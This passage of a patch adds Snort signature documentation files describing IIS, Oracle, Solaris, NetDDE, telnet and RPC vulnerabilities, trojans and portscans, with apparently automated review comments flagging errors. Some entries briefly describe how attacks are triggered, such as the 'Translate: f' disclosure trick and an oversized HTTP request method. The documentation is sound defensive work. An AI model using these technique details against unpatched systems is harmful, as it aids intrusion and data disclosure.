+Microsoft Internet Information Services (IIS) 5.0 contains scripting engines to support various advanced files types such as .ASP and .HTR.  The scripting engines permit the execution of server-side processing.  IIS determines which scripting engine is appropriate depending on the file extension.  If an attacker crafts a URL request ending in 'Translate: f' and followed by a slash '/', IIS fails to send the file to the appropriate scripting engine for processing.  Instead, it returns the source code of a referenced file, such as global.asa, to the browser.  The Nessus vulnerability scanner references the global.asa file in a GET request to determine whether a host is susceptible to this exploit.
+
+--
+Affected Systems:
+Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL that includes the 'Translate: f' followed by a '/' to disclose the source code of a file such as global.asa on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  The Nessus vulnerability scanner can test for this exploit. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
+
+--
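Review bot: Detailed Information misdescribes the technique: "Translate: f" is an HTTP request header, not something a "URL request ending in" can contain, and the character appended to the resource name in the MS00-058 bulletin is a backslash, not "a slash '/'". Rewrite it as: the client requests the file with a trailing backslash and sends a "Translate: f" header, and IIS returns the source instead of processing it. Also note that, per the Summary, the rule keys on "/global.asa" in the URI and does not inspect the header, so it fires on any request for that file whether or not the header is present.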
--- /dev/null
+++ b/doc/signatures/1672.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1672
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with certain versions of the Sun Solaris FTP server.  
+
+--
+Impact:
+Reconnaissance.  An attacker may be able to examine records from the password shadow file.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with a globbing function in Sun Solaris FTP servers.  An attacker may exploit this vulnerability by logging into the FTP server with a valid username and an invalid password then supplying the command "CWD ~".  This may produce a core dump in the root directory with world-readable permissions that could be examined to discover valid FTP users for the server.  
+
+--
+Affected Systems:
+
+SPARC
+
+    * Solaris 2.5 without patch 103577-13
+    * Solaris 2.5.1 without patch 103603-16
+    * Solaris 2.6 without patch 106301-03
+    * Solaris 2.7 without patch 110646-02
+    * Solaris 2.8 without patch 111606-01
+
+Intel
+
+    * Solaris 2.5 without patch 103578-13
+    * Solaris 2.5.1 without patch 103604-16
+    * Solaris 2.6 without patch 106302-03
+    * Solaris 2.7 without patch 110647-02
+    * Solaris 2.8 without patch 111607-01
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability to learn valid FTP usernames to later attempt brute force guessing of passwords.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2601
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0421
+
+--
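Review bot: the Summary describes "a buffer overflow" while Impact and Detailed Information describe a world-readable core dump in the root directory that exposes account information; the Summary should state the outcome the rule is written to detect so the three sections agree. Since Detailed Information says the dump itself is world-readable, Corrective Action should also tell the reader to remove or restrict any core file already written to / after patching.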
--- /dev/null
+++ b/doc/signatures/2771.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2771
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
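Review bot: the procedure name at the end of Detailed Information is cut off from its sentence by a stray line break, leaving a line that starts with a period ("vulnerability in the procedure drop_priority_char" / ". This procedure is included in"); join the two lines. Affected Systems reads "Oracle Oracle9i", duplicating the vendor name, and Additional References is empty although Corrective Action points to a vendor patch; add the vendor alert link.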
--- /dev/null
+++ b/doc/signatures/2961.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2961
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/532.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+532
+
+--
+Summary:
+This event is generated when an attempt is made to access an administrative share on a Windows machine.
+
+--
+Impact:
+Serious. Possible administrator access on the victim machine. 
+
+--
+Detailed Information:
+This rule  generates an event when the hidden Netbios share Admin$, which is the Winnt directory, is accessed via SMB. 
+
+This is a poor security practice or an indication that a machine is being accessed remotely. 
+
+--
+Affected Systems:
+	Windows 9x
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenario:
+This can be accessed from GUI "map network drive" remotely 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to disallow Netbios access from the unprotected network.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References:
+
+arachnids 340 
+
+--
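Review bot: two headings in this file break the template used by every other document in the patch: "Attack Scenario:" should be "Attack Scenarios:" and "References:" should be "Additional References:". Affected Systems lists Windows 9x, but Detailed Information describes Admin$ as "the Winnt directory", which points at the NT family; check that list. "This rule  generates" has a doubled space.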
--- /dev/null
+++ b/doc/signatures/2560.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2560
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
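Review bot: the version strings under Affected Systems contain stray spaces inside the version numbers ("Oracle Application Server Web Cache 10g 9.0.4 .0", "Oracle Oracle9i Application Server Web Cache 2.0 .0.4"); they should read 9.0.4.0, 2.0.0.4 and so on, or a reader searching for an exact version will miss them. The blank lines inserted after several "--" separators (before Impact, Attack Scenarios, Ease of Attack, False Positives and Corrective Action) are not used in the other documents; remove them. Additional References is empty despite Corrective Action pointing to a vendor patch.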
--- /dev/null
+++ b/doc/signatures/1252.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1252
+
+--
+Summary:
+This event is generated after a sucessful exploit of the BSD derived Telnet daemon.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+compromise of a telnet server.
+
+--
+Detailed Information:
+This event is generated after a possible sucessful attempt to compromise
+a server running a BSD derived version of Telnet. A buffer overflow
+condition exists that may present an attacker with the opportunity to
+execute code of their choosing.
+
+The attacker does not need to login to the server to exploit this
+vulnerability, only a connection to the server is needed.
+
+--
+Affected Systems:
+	Multiple Vendor Telnet servers running versions of telnetd derived
+	from the BSD telnet daemon.
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available. This vulnerability may
+also be exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
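Review bot: "sucessful" is misspelled in both the Summary and Detailed Information. The Summary also asserts the event is generated "after a sucessful exploit", whereas Impact says it "may or may not indicate a successful root compromise" and Detailed Information says "possible"; the Summary should carry the same qualification, since the rule cannot confirm success. Additional References is empty for a vulnerability the text says has public exploits; add the advisory reference.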
--- /dev/null
+++ b/doc/signatures/1661.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1661
+
+--
+Summary:
+This event is generated when an attempt is made to access the cmd32.exe file.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Detailed Information:
+The cmd32.exe file allows execution of commands on Windows hosts.  This file is only accessible if maliciously placed in the web server's root directory or an attacker performs unauthorized directory traversal.  This may permit the attacker to execute arbitrary commands on the vulnerable server.
+
+--
+Affected Systems:
+???
+
+--
+Attack Scenarios:
+An attacker can attempt to access the cmd32.exe file to execute arbitrary commands on the vulernable server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Make sure that the cmd32.exe is not in the webroot directory.
+
+Make sure that all appropriate patches have been applied.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
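Review bot: Affected Systems still holds the placeholder "???"; fill it in (Detailed Information implies Windows hosts running a web server) or mark it not applicable as other documents do. "vulernable" in Attack Scenarios is a typo, and "Make sure that the cmd32.exe is not in the webroot directory." should drop the article before the filename.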
--- /dev/null
+++ b/doc/signatures/1437.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+1437
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+This rule detects the following Windows Media file types:
+
+  File extension   MIME type
+     .wmz        application/x-ms-wmz
+     .wmd        application/x-ms-wmd
+     .wma        audio/x-ms-wma
+     .wax        audio/x-ms-wax
+     .wmv        audio/x-ms-wmv
+     .asf        video/x-ms-asf
+     .asx        video/x-ms-asf
+     .wvx        video/x-ms-wvx
+     .wm         video/x-ms-wm
+     .wmx        video/x-ms-wmx
+
+--
+Affected Systems:
+	All Windows systems running Windows Media player applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Windows Media file types:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;288102
+
+--
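Review bot: Corrective Action is empty; since Impact frames this as a policy matter and Detailed Information notes that the clients "may also contain vulnerabilities", it should at least say to check the download against policy and keep the media client patched. In the file type table, .wmv is listed as audio/x-ms-wmv while the neighbouring video containers (.asf, .wvx, .wm, .wmx) carry video/ types; check that entry against the Microsoft KB article cited in Additional References.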
--- /dev/null
+++ b/doc/signatures/1113.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1113
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
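Review bot: Affected Systems is empty; Detailed Information names web servers, web applications and FTP servers, so that list belongs there. Attack Scenarios only describes browsing "outside the ftp root directory", while Detailed Information covers web servers too; either widen the scenario or say which service this SID targets. "web, web applications and ftp servers" should read "web servers, web applications and FTP servers".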
--- /dev/null
+++ b/doc/signatures/1676.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1676
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
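Review bot: the Affected Systems section is missing entirely; Detailed Information runs straight into Attack Scenarios. Attack Scenarios opens with "Simple.", which is the Ease of Attack answer and says nothing about the scenario. Detailed Information says "This connection can either be a legitimate telnet connection or the result of spawning a remote shell", which reads as text carried over from a telnet rule; this document is about commands sent to an Oracle database server. "Sid: 1676" also puts the value on the heading line, unlike the other documents, and the $ORACLE_PORTS guidance is given twice (Detailed Information and False Negatives).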
--- /dev/null
+++ b/doc/signatures/2255.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2255
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access.  This attack may permit execution of arbitrary commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite 
+applications to perform remote distributed system administration tasks 
+such as adding new users.  
+
+This event indicates that an RPC query for the sadmind service has been
+made with the credentials of the root user supplied.
+
+This may permit execution of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+All systems using sadmind
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root access to the remote host.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
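Review bot: the Summary says an attempt to "exploit a known vulnerability", but Detailed Information says the event fires on an sadmind RPC query "with the credentials of the root user supplied"; the Summary should state that detection condition, because that is what a responder needs to triage the alert. In Corrective Action, "ensure access is denied to RPC-enabled machines" reads as denying those machines access; reword it to denying external access to the RPC ports on those machines. Additional References is empty.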
--- /dev/null
+++ b/doc/signatures/195.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+195
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
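Review bot: the Summary does not say when the event is generated, unlike every other document here; Attack Scenarios says it indicates "an existing infection being activated", so that statement belongs in the Summary. The Affected Systems section is missing; the OS list sits under Detailed Information instead. "Deepthroat sever" should read "server", and the "See also" list includes this rule's own sid (195).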
--- /dev/null
+++ b/doc/signatures/2095.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2095
+
+--
+Summary:
+vulnerability in the rpc service for the Calendar Manager Service Daemon
+(CMSD) used by XDR.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdr_array) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request containing a large number of arguments 
+to xdr_array can lead to remote system compromise and super user access 
+to the target host. Additionally, a denial of service and execution of 
+arbitrary code with the privilege of the super user is also possible 
+depending on the platform used.
+
+--
+Affected Systems:
+Multiple verndors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request containing a 
+large number of arguments for xdr_array to the target host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5356
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391
+
+CERT:
+http://www.cert.org/advisories/CA-2002-25.html
+http://www.kb.cert.org/vuls/id/192995
+
+--
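Review bot: the Summary is a sentence fragment; it begins at "vulnerability in the rpc service for the Calendar Manager Service Daemon" and is missing its subject (the other documents open with "This event is generated when an attempt is made to exploit a known"). "used by XDR" also inverts the relationship Detailed Information describes: CMSD uses the XDR library, not the other way round. "verndors" in Affected Systems is a typo.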
--- /dev/null
+++ b/doc/signatures/122-27.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-27
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a open port
+was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
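Review bot: the Summary says the traffic "may constitute an attack", yet the specific condition is that an open port was detected, which Impact rates as "Unknown"; say plainly that the preprocessor reported an open port found during a scan. Typos: "a open port" (Summary), "reconnaisance" (Impact), "consititute" (Detailed Information). The file also opens with two blank lines before "Rule:".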
--- /dev/null
+++ b/doc/signatures/2661.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2661
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2754.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2754
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
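Review bot: same formatting defect as 2771.txt: the procedure name is separated from its sentence by a stray line break ("vulnerability in the procedure comment_on_site_priority" / ". This procedure is included in"); join the lines. "Oracle Oracle9i" duplicates the vendor name and Additional References is empty despite Corrective Action pointing to a vendor patch.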
--- /dev/null
+++ b/doc/signatures/2160.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2160
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
